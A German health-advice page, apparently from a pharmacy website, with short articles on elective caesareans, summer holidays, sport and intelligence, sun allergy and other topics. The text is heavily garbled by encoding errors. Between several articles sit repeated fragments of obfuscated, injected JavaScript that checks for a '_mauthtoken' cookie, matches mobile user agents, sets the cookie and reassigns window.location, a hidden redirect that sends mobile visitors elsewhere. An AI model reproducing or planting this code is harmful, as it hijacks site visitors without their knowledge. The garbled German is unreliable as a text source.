NatA?rliche Geburt vs. Wunschkaiserschnitt

Obwohl ursprA?nglich als Notfall-MaAYnahme gedacht, wird er mittlerweile immer hAi??ufiger ohne zwingenden, medizinischen Grund durchgefA?hrt: Der Kaiserschnitt als Alternative zur natA?rlichen Geburt. Die Anzahl der Kinder, die per Kaiserschnitt entbunden werden, hat sich in den letzten beiden Jahrzehnten fast verdoppelt. Der Hauptgrund hierfA?r ist die Tatsache, dass sich die werdenden MA?tter bereits von vornherein gegen eine natA?rliche Geburt und fA?r den Wunsch-Kaiserschnitt entscheiden.
Diese Entscheidung ist auf viele, unterschiedliche Faktoren, wie schlechte Erfahrungen aus dem Bekanntenkreis, Angst vor den Schmerzen einer natA?rlichen Geburt oder davor, dass bei einer natA?rlichen Geburt allgemein mehr schiefgehen kann, gebaut.
Ein solcher Wunsch-Kaiserschnitt hat Vor- und Nachteile. Schnell entkrAi??ften lassen sich Annahmen, dass diese Art der Entbindung in absolut jedem Fall besser planbar und besser fA?r die Figur der werdenden Mutter ist. Denn trotz Termin kAi??nnen im Krankenhaus immer noch echte Not-Kaiserschnitte dazwischen kommen und den geplanten Kaiserschnitt verschieben. Des Weiteren mA?ssen zusAi??tzliche Schwangerschaftspfunde so oder so selbststAi??ndig wieder abgenommen werden, hier hat die Art der Geburt keinen Einfluss.
FA?r die werdende Mutter ergeben sich beim Wunsch-Kaiserschnitt sogar noch weitere Nachteile: Das Risiko fA?r Komplikationen ist ungefAi??hr doppelt bis dreifach so hoch wie das bei einer natA?rlichen Geburt. Bei einer Folgeschwangerschaft steigt zusAi??tzlich die Wahrscheinlichkeit eines GebAi??rmutterrisses. Da es sich bei einem Kaiserschnitt nach wie vor um eine Operation handelt, besteht hier auAYerdem das Risiko von Verletzungen anderer Organe, wie zum Beispiel der Harnleiter oder der Blase. Unter UmstAi??nden ist dann ein weiterer Eingriff notwendig.
Auch beim Abheilen der Narbe kann es zu Komplikationen kommen. Zudem bleiben Frauen, die per Kaiserschnitt entbunden haben, ca. drei Tage lAi??nger im Krankenhaus als Frauen, die ihr Kind auf natA?rliche Art geboren haben. Neben einem Katheter und einer Drainage in der Wunde, die zusAi??tzlich behindern, ist es auAYerdem nicht mAi??glich, das Baby sofort selbst zu versorgen. Die Frauen dA?rfen nicht einmal innerhalb der ersten 24 Stunden aufstehen. Auch wenn ein Kaiserschnitt mittlerweile ein Routineeingriff ist, sollte man ihn, im Vergleich zu einer natA?rlichen Geburt, deshalb nicht verharmlosen.
Einem, durch einen Kaiserschnitt geborenen, Baby fehlen Keime und Bakterien, die bei einer vaginalen Geburt von der Mutter auf das Kind A?bertragen werden und so zu einer Grundimmunisierung fA?hren. AuAYerdem hat sich gezeigt, dass Babys, die per Kaiserschnitt zur Welt kommen, oft grAi??AYerer Schwierigkeiten bei der Anpassung haben, unruhiger sind und hAi??ufiger schreien. Oft wird ein Wunsch-Kaiserschnitt auch zu frA?h durchgefA?hrt und verursacht so Atemprobleme beim Baby.
Nicht zu vergessen ist bei der Entscheidung zwischen einem Wunsch-Kaiserschnitt und einer natA?rlichen Geburt, dass es sich bei einer natA?rlichen Geburt, wie die Bezeichnung schon sagt, um einen natA?rlichen Prozess handelt, beim Wunsch-Kaiserschnitt dagegen um einen Eingriff. Dieser steht glA?cklicherweise zur VerfA?gung, um bei Komplikationen rettend eingreifen zu kAi??nnen, ist aber grundsAi??tzlich nicht dazu gedacht, die natA?rliche Geburt zu ersetzen. Normalerweise wird ein solcher Kaiserschnitt durchgefA?hrt, wenn die Lage des Kindes eine vaginale Geburt unmAi??glich macht oder das Verletzungsrisiko des Kindes dabei zu hoch wAi??re.
Ein Kaiserschnitt ist ebenfalls medizinisch angeraten, wenn die werdende Mutter Erkrankungen hat, die Auswirkungen auf die Geburt haben kAi??nnten. Ai??ngste vor einer natA?rlichen Geburt sollte man deshalb beim betreuenden Frauenarzt ansprechen. Dieser kann wertvolle RatschlAi??ge geben und bei der Frage, ob es wirklich ein Wunsch-Kaiserschnitt sein muss, beratend tAi??tig sein.

Keine Langeweile in den groAYen Ferien aufkommen lassen

Die groAYen Ferien sind nicht nur auf dem Kalender lang. Kinder empfinden Zeit noch anders als Erwachsene, gerade fA?r jA?ngere Schulkinder werden die Sommerferien deshalb schnell zu einer Ewigkeit. Das kann einerseits ganz wunderbar sein, vor allem wenn bei schAi??nem Sommerwetter viele Freunde in der NAi??he sind oder wenn eine aufregende Reise auf dem Plan steht. Selbst der schAi??nste Urlaub deckt aber in aller Regel keineAi??neun Wochen Ferien ab und so muss man sich etwas einfallen lassen, um doch keine Langeweile aufkommen zu lassen. Das Kind beginnt sonst schnell zu quengeln, das zerrt wiederum an den Nerven der Eltern und am Ende ist die ganze Familie gereizt.

So einfach und verlockend es sein kann, hier mit dem Fernseher oder der Spielekonsole Abhilfe zu schaffen: Vor allem jA?ngere Kinder sollten so nicht ihre Sommerferien verbringen. Deutlich sinnvoller ist es, sich A?ber Programme von Ferienfreizeiten zu informieren, die in vielen Gegenden angeboten werden. Je nach Angebot sind hier ein- oder mehrtAi??gige AusflA?ge denkbar oder auch nur stundenweise BeschAi??ftigungen. Auch bieten manche Bibliotheken oder Museen besondere Angebote fA?r die groAYen Ferien an.

FA?r kleinere Kinder ist auch bereits schon Camping im eigenen Garten interessant. Auch wenn man nicht weit gehen muss und das Zelt nur wenige Meter vom Haus entfernt steht, ist es trotzdem etwas ganz anderes, als im Bett zu schlafen. Die Ferien bieten sich auch an, um die Umgebung einfach noch einmal neu zu erkunden. Bei langen StreifzA?gen mit Freunden findet man ganz bestimmt noch Dinge, die einem bisher so noch nicht aufgefallen sind.

Dazu kann man auch – vielleicht sogar zusammen mit anderen Eltern – selbst Abwechslung fA?r die Ferien organisieren und die Kinder gegenseitig mit zu AusflA?gen oder auch ins Freibad nehmen. Wer ganz auf der sicheren Seite sein will, denkt hier auch gleich A?ber einen Plan B fA?r schlechtes Wetter nach, damit es keine allzu enttAi??uschten Gesichter gibt. (k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Sport ist Intelligenztraining

Wer sich bewegt, ist schlau! Und das nicht nur deshalb, weil der KAi??rper in Bewegung kommt, sondern weil regelmAi??AYiges Ausdauertraining auch die Intelligenz fAi??rdert.
Gemessen wurde das einmal mit SprachvermAi??gen, geometrisches sowie mathematisch und technisches Denken. Es zeigten sich klare ZusammenhAi??nge zwischen Ausdauersportarten und Intelligenz. Schnell- und Muskelkraft betonte Sportarten schnitten schlecht ab.

Intelligenztests konnten von Ausdauersportlern besser gelAi??st werden. Gemessen wurde vor Aufnahme des Trainings und drei Monate danach. Es zeigte sich klar: Ausdauertraining steigert die Intelligenz.

Die Forscher fanden verschiedene ErklAi??rungen hierfA?r. Durch das trainierte Herz-Kreislaufsystem werden vermehrt wichtige Stoffe fA?r das Gehirn zur VerfA?gung gestellt. Ein anderer Ansatz ist, das vor allem bei laufsportlichen BetAi??tigungen in schwierigem GelAi??nde ein Plus erzielt wird. Nordic Walking oder Trailrunning wird auf Wegen gemacht, wo jeder Schritt bewusst gesetzt werden muss. Der immense Abwechslungsreichtum von Bewegungsmustern erfordert vom Gehirn ein hohes MaAY an Arbeit. Um diese Koordinationsaufgaben zu bewAi??ltigen, ist solche eine Anstrengung vonnAi??ten, die vergleichbar ist mit dem LAi??sen von komplexen mathematischen Aufgaben. Das trainiert natA?rlich auch das Gehirn sowie das rAi??umliche DenkvermAi??gen.
Als Fazit kann man sagen – Ausdauersport stAi??rkt nicht nur den KAi??rper, sonder auch den Geist. Und wie schon die alten RAi??mer in der Antike wussten: Mens sana in corpore sano – In einem gesunden KAi??rper steckt ein gesunder Geist. ca|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Sonnige Zeiten fA?r die Sonnenallergie

Endlich Sommer und dann das: Pickelchen, Pusteln, BlAi??schen, Schwellungen, Juckreiz, RAi??tungai??i?? Symptome einer Sonnen-/Lichtallergie, die sich direkt auf den der Sonne ausgesetzten Hautbereichen zeigen. Es gibt verschiedene Formen der Sonnenallergie, in AbhAi??ngigkeit zu den AuslAi??sern – UV-Licht ist dabei immer ein wesentlicher Faktor. Eine echte Allergie, eine wirkliche Sonnen-UnvertrAi??glichkeit gibt es aber nicht – das Sonnenlicht ist fA?r uns lebenswichtig; die Dosis macht das Gift.

Am stAi??rksten vertreten ist wohl die Polymorphe, auch als Sonnenekzem bezeichnete, Lichtdermatose (PLD); sie tritt gerne dann auf, wenn unsere Haut keine Gelegenheit hatte, sich an die Sonne zu gewAi??hnen (im FrA?hsommer, oder wennai??i??s im Winter ai??zab in den SA?denai??? geht). Frauen sind hAi??ufiger als MAi??nner, und jA?ngere hAi??ufiger als Ai??ltere Zeitgenossen betroffen. Pickel, Pusteln, Papeln oder BlAi??schen verbunden mit RAi??tung und heftigem Juckreiz zeigen sich wenige Stunden nach der UV-Exposition bevorzugt am DekolletAi??, im Nacken-Schulter-Bereich und an den Innenseiten der Arme.

Von Mallorca Akne ist die Rede, wenn bei der Entstehung neben der UV-Strahlung die Inhaltsstoffe von Kosmetika (zum Beispiel von Sonnencreme) eine Rolle spielen. Es kann tatsAi??chlich vorkommen, dass Produkte, welche die Haut vor SonnenschAi??den schA?tzen sollen, aufgrund ihrer Ingredienzen (Fette, Emulgatoren, Duftstoffe, Parfums kAi??nnen problematisch sein) in Kombination mit Sonne und Hitze eine solche Reaktion auslAi??sen. Die HautverAi??nderungen – kleine, entzA?ndete KnAi??tchen, die jucken – Ai??hneln optisch stark der einer gewAi??hnlichen Akne. Neben dem Gesicht sind oft Schultern, DekolletAi?? und der obere RA?cken betroffen.

Eine phototoxische Reaktion liegt vor, wenn Photosensibilisatoren die Lichtempfindlichkeit unserer Haut erhAi??hen. Enthalten sind sie in einigen Medikamenten (etwa in Antibiotika), Pflanzen oder auch Parfums. Wir bekommen dann schneller Sonnenbrand mit den bekannten Anzeichen wie RAi??tung, WAi??rmebildung, Hautjucken/-brennen bis hin zu Blasenbildung. Die Haut kann entweder groAYflAi??chig empfindlicher sein (etwa durch die Einnahme von Medikamenten) oder nur an Stellen, wo unsere Haut mit Photosensibilisatoren wie Pflanzen oder Parfums (Vorsicht bei Bergamotte-Ai??l) in Kontakt gekommen ist.

Noch seltener ist die photoallergische Reaktion, deren AuslAi??ser ebenfalls UnvertrAi??glichkeiten sind. Die Symptome fallen heftiger aus als bei der phototoxischen ai??zKolleginai???, Ai??hneln der einer Kontaktallergie und treten meist erst in einem zeitlichen Abstand von 12 oder mehr Stunden nach der UV-Einstrahlung auf.

Schnelle Hilfe bei Sonnenallergie
Zuallererst: Raus aus der Sonne. Die Haut mit kaltem Wasser abzuspA?len tut gut. BewAi??hrt hat sich die antientzA?ndliche Behandlung mit Cremes oder Sprays, damit die Haut sich wieder stabilisiert und die Beschwerden abklingen. Wir beraten Sie gern, welches rezeptfreie Mittel gegen Ihre spezielle Sonnenallergie gut vertrAi??glich und schnell wirksam ist.

Mit Vorsicht genieAYen

Zur Vermeidung einer Sonnenallergie sollte im Sommer direkter Sonnenbestrahlung in der Zeit zwischen 11 und 15 Uhr aus dem Wege gegangen werden. Kleidung schA?tzt vor UV-Strahlung -Ai??Menschen, die in sonnenverwAi??hnten Regionen leben, gehen uns diesbezA?glich oft mit gutem Beispiel voran, Kopfbedeckung inklusive. Freie, unbekleidete Haut braucht extra Sonnenschutz. Rechtzeitig eincremen, die meisten Mittel benAi??tigen etwas Zeit, um die volle Wirksamkeit zu erzielen. Das Produkt sollte auf den Hauttyp abgestimmt sein – insbesondere bei einer Neigung zu Sonnenallergie. Bestimmte Inhaltsstoffe sind beispielsweise tabu, wenn die Gefahr einer Mallorca-Akne besteht. Da auch Medikamente die LichtsensibilitAi??t steigern kAi??nnen, beachten Sie bitte die Hinweise der Packungsbeilage oder fragen Sie uns.

Hallux valgus: Vorsicht vor FolgeschAi??den!

Anfangs spA?rt man es nur in schmalen High Heels: den schmerzhaften Druck aufs GroAYzehengrundgelenk oder auf einen der kleinen Zehen. Doch schon jede dritte 20-JAi??hrige zeigt AnsAi??tze eines Hallux valgus, was viele aber nicht davon abhAi??lt, weiterhin auf hohen AbsAi??tzen zu gehen. Aber irgendwann tutAi??s auch in Sportschuhen empfindlich weh …

› mehr auf APOdirekt

\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Burgenland impft gegen Meningokokken B-Erkrankung

Eine gemeinsame Kampagne der BurgenlAi??ndischen Landesregierung, der Ai??rztekammer, der Apothekerkammer und GlaxoSmithKline Pharma GmbH macht auf die GefAi??hrlichkeit der Meningokokken B – Erkrankung aufmerksam.

› mehr auf APOdirekt

x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Winterpollen im Anflug

Augenjucken und eine tropfende Nase Ai?? in den meisten FAi??llen werden solche Symptome als ErkAi??ltung abgetan, dies ist jedoch nicht immer der Fall. Denn was die wenigsten wissen: Auch im Winter kAi??nnen Pollen fA?r Allergiebeschwerden sorgen und fA?r Betroffene unangenehm sein.

› mehr auf APOdirekt

\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Mutterkraut ist Arzneipflanze 2017

Die Wissenschaft gewinnt stAi??ndig neue Erkenntnisse A?ber Wirkstoffe und positive Effekte traditioneller Heilpflanzen. Zur Arzneipflanze 2017 wurde Mutterkraut gekA?rt. Diese traditionelle Heilpflanze zeichnet sich durch gute Wirksamkeit und ausgezeichnete VertrAi??glichkeit in der vorbeugenden Behandlung von MigrAi??ne aus.

› mehr auf APOdirekt

